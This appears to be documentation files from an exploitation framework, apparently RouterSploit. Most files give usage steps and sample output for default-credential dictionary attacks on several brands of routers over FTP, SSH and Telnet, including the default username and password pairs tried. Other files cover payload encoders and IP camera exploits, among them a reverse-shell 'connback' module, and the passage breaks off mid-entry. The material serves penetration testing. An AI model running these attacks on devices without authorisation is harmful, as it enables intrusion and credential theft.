"docs/modules/creds/routers/pfsense/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against PFSense Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/pfsense/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/pfsense/telnet_default_creds\nrsf (PFSense Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (PFSense Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/technicolor/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Technicolor Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/technicolor/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/technicolor/ftp_default_creds\nrsf (Technicolor Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Technicolor Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/technicolor/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Technicolor Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/technicolor/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/technicolor/ssh_default_creds\nrsf (Technicolor Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Technicolor Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/technicolor/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Technicolor Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/technicolor/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/technicolor/telnet_default_creds\nrsf (Technicolor Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Technicolor Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/thomson/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Thomson Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/thomson/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/thomson/ftp_default_creds\nrsf (Thomson Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Thomson Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/thomson/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Thomson Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/thomson/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/thomson/ssh_default_creds\nrsf (Thomson Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Thomson Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/thomson/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Thomson Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/thomson/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/thomson/telnet_default_creds\nrsf (Thomson Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Thomson Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/tplink/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against TP-Link Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/tplink/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/tplink/ftp_default_creds\nrsf (TP-Link Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (TP-Link Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/tplink/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against TP-Link Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/tplink/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/tplink/ssh_default_creds\nrsf (TP-Link Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (TP-Link Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/tplink/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against TP-Link Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/tplink/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/tplink/telnet_default_creds\nrsf (TP-Link Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (TP-Link Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/ubiquiti/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Ubiquiti Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/ubiquiti/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/ubiquiti/ftp_default_creds\nrsf (Ubiquiti Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Ubiquiti Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/ubiquiti/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Ubiquiti Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/ubiquiti/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/ubiquiti/ssh_default_creds\nrsf (Ubiquiti Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Ubiquiti Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/ubiquiti/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Ubiquiti Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/ubiquiti/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/ubiquiti/telnet_default_creds\nrsf (Ubiquiti Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Ubiquiti Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/zte/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against ZTE Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/zte/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/zte/ftp_default_creds\nrsf (ZTE Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (ZTE Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/zte/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against ZTE Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/zte/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/zte/ssh_default_creds\nrsf (ZTE Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (ZTE Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/zte/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against ZTE Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/zte/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/zte/telnet_default_creds\nrsf (ZTE Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (ZTE Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/creds/routers/zyxel/ftp_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Zyxel Router FTP service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/zyxel/ftp_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/zyxel/ftp_default_creds\nrsf (Zyxel Router Default FTP Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Zyxel Router Default FTP Creds) > run\n[*] Running module...\n[*] Target exposes FTP service\n[*] Starting attack against FTP service\n[*] thread-0 thread is starting...\n[-] Authentication Failed - Username: 'admin' Password: '12345'\n[-] Authentication Failed - Username: 'admin' Password: '123456'\n[-] Authentication Failed - Username: 'Admin' Password: '12345'\n[-] Authentication Failed - Username: 'Admin' Password: '123456'\n[+] Authenticated Succeed - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 0.06290411949157715 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 21 ftp admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/zyxel/ssh_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Zyxel Router SSH service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/zyxel/ssh_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/zyxel/ssh_default_creds\nrsf (Zyxel Router Default SSH Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Zyxel Router Default SSH Creds) > run\n[*] Running module...\n[*] Target exposes SSH service\n[*] Starting default credentials attack against SSH service\n[*] thread-0 thread is starting...\n[-] SSH Authentication Failed - Username: 'admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'admin' Password: '123456'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'\n[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'\n[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 2.3932292461395264 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 22 ssh admin admin \n\n```\n" }, { "path": "docs/modules/creds/routers/zyxel/telnet_default_creds.md", "content": "## Description\n\nModule performs dictionary attack with default credentials against Zyxel Router Telnet service.\nIf valid credentials are found, they are displayed to the user.\n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use creds/routers/zyxel/telnet_default_creds`\n 3. Do: `set target [TargetIP]`\n 4. Do: `run`\n 5. If valid credentials are found, they are displayed to the user.\n\n## Scenarios\n\n```\nrsf > use creds/routers/zyxel/telnet_default_creds\nrsf (Zyxel Router Default Telnet Creds) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Zyxel Router Default Telnet Creds) > run\n[*] Running module...\n[*] Target exposes Telnet service\n[*] Starting default credentials attack against Telnet service\n[*] thread-0 thread is starting...\n[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'\n[-] Telnet Authentication Failed - Username: '1234' Password: '1234'\n[-] Telnet Authentication Failed - Username: 'root' Password: '12345'\n[-] Telnet Authentication Failed - Username: 'root' Password: 'root'\n[+] Telnet Authentication Successful - Username: 'user' Password: 'user'\n[*] thread-0 thread is terminated.\n[*] Elapsed time: 5.389287948608398 seconds\n[+] Credentials found!\n\n Target Port Service Username Password\n ------ ---- ------- -------- --------\n 192.168.1.1 23 telnet user user\n\n```\n" }, { "path": "docs/modules/encoders/perl/base64.md", "content": "## Description\n\nModule encodes Perl payload to base64 format. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use encoders/perl/base64`\n 3. Do: `show info`\n\n## Scenarios\n\n```\nrsf > use encoders/perl/base64\nrsf (Perl Base64 Encoder) > show info\n\nName:\nPerl Base64 Encoder\n\nDescription:\nModule encodes PERL payload to Base64 format.\n\nAuthors:\n- Marcin Bury \n```\n" }, { "path": "docs/modules/encoders/perl/hex.md", "content": "## Description\n\nModule encodes Perl payload to hex format. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use encoders/perl/hex`\n 3. Do: `show info`\n\n## Scenarios\n\n```\nrsf > use encoders/perl/hex\nrsf (Perl Hex Encoder) > show info\n\nName:\nPerl Hex Encoder\n\nDescription:\nModule encodes PERL payload to Hex format.\n\nAuthors:\n- Marcin Bury \n```\n" }, { "path": "docs/modules/encoders/php/base64.md", "content": "## Description\n\nModule encodes PHP payload to base64 format. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use encoders/php/base64`\n 3. Do: `show info`\n\n## Scenarios\n\n```\nrsf > use encoders/php/base64\nrsf (PHP Base64 Encoder) > show info\n\nName:\nPHP Base64 Encoder\n\nDescription:\nModule encodes PHP payload to Base64 format.\n\nAuthors:\n- Marcin Bury \n```\n" }, { "path": "docs/modules/encoders/php/hex.md", "content": "## Description\n\nModule encodes PHP payload to Hex format. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use encoders/php/hex`\n 3. Do: `show info`\n\n## Scenarios\n\n```\nrsf > use encoders/php/hex\nrsf (PHP Hex Encoder) > show info\n\nName:\nPHP Hex Encoder\n\nDescription:\nModule encodes PHP payload to Hex format.\n\nAuthors:\n- Marcin Bury \n```\n" }, { "path": "docs/modules/encoders/python/base64.md", "content": "## Description\n\nModule encodes Python payload to base64 format. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use encoders/python/base64`\n 3. Do: `show info`\n\n## Scenarios\n\n```\nrsf > use encoders/python/base64\nrsf (Python Base64 Encoder) > show info\n\nName:\nPython Base64 Encoder\n\nDescription:\nModule encodes Python payload to Base64 format.\n\nAuthors:\n- Marcin Bury \n```\n" }, { "path": "docs/modules/encoders/python/hex.md", "content": "## Description\n\nModule encodes Python payload to hex format. \n\n## Verification Steps\n\n 1. Start `./rsf.py`\n 2. Do: `use encoders/python/hex`\n 3. Do: `show info`\n\n## Scenarios\n\n```\nrsf > use encoders/python/hex\nrsf (Python Hex Encoder) > show info\n\nName:\nPython Hex Encoder\n\nDescription:\nModule encodes Python payload to Hex format.\n\nAuthors:\n- Marcin Bury \n```\n" }, { "path": "docs/modules/exploits/cameras/acti/acm_5611_rce.md", "content": "## Description\n\nModule exploits ACTi ACM-5611 Video Camera Remote Command Execution Exploit.\n\n## Verification Steps\n\n\n 1. Start ./rsf.py\n 2. use exploits/cameras/acti/acm_5611_rce\n 3. set target 192.168.1.1\n 4. run\n 5. If device is vulnerable user credentials are returned.\n\n## Scenarios\n\n```\nrsf > use exploits/cameras/acti/acm_5611_rce\nrsf (JACTi ACM-5611 Video Camera RCE) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (JACTi ACM-5611 Video Camera RCE) > run\n[*] Running module...\n[+] Target seems to be vulnerable" }, { "path": "docs/modules/exploits/cameras/geuterbruck/efd_2250.md", "content": "## Description\n\nThis module exploits a an arbitrary command execution vulnerability. The vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an anonymous user to execute arbitrary commands with root privileges.\n\n## Verification Steps\n\n 1. Start ./rsf.py\n 2. use exploits/cameras/geuterbruck/efd_2250\n 3. set target 192.168.1.1\n 5. run\n 6. If device is vulnerable you will receive reverse shell.\n\n## Scenarios\n\n```\nrsf > use exploits/cameras/geuterbruck/efd_2250\nrsf (Geutebruck G-Cam/EFD-2250 RCE) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Geutebruck G-Cam/EFD-2250 RCE) > run\n[*] Running module exploits/cameras/geuterbruck/efd_2250...\n[+] Target seams 192.168.1.1:80 is vulnerable\n\n```\n" }, { "path": "docs/modules/exploits/cameras/jovision/jovision_credentials_disclosure.md", "content": "## Description\n\nModule exploits a CGI script that doesn't validate whether the client is logged in on some jovision cameras to return credentials.\n\n## Verification Steps\n\n\n 1. Start ./rsf.py\n 2. use exploits/cameras/jovision/jovision_credentials_disclosure\n 3. set target 192.168.1.1\n 4. run\n 5. If device is vulnerable user credentials are returned.\n\n## Scenarios\n\n```\nrsf > use exploits/cameras/jovision/jovision_credentials_disclosure\nrsf (Jovision camera credential disclosure) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Jovision camera credential disclosure) > run\n[*] Running module...\n[+] Target seems to be vulnerable\n[+] Accounts found:\n\n Description Username Password Administrator\n ----------- -------- -------- -------------\n Admin account admin ADMIN Yes\n Guest account guest 1234 No\n```\n" }, { "path": "docs/modules/exploits/cameras/multi/cctv_dvr_rce.md", "content": "## Description\n\nRemote Code Execution in CCTV-DVR affecting over 70 different vendors\n\n## Verification Steps\n\n\n 1. Start ./rsf.py\n 2. use exploits/cameras/multi/cctv_dvr_rce\n 3. set target 192.168.1.1\n 4. set connback 192.168.1.100:5555\n 5. run\n 6. If device is vulnerable you will receive reverse shell.\n\n## Scenarios\n\n```\nrsf > use exploits/cameras/multi/cctv_dvr_rce\nrsf (Multiple CCTV-DVR Vendors) > set target 192.168.1.1\n[+] target => 192.168.1.1\nrsf (Multiple CCTV-DVR Vendors) > set connback 